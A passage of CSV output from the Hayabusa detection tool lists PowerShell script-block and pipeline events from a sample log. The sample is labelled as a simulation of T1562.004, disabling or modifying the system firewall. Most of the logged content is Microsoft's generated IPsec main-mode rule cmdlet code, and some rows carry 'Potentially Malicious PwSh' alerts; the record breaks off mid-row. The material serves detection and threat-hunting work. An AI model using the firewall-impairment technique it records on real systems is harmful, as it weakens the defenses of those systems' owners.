($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.865 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.865 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.867 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.868 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.869 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.870 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.870 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.871 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh 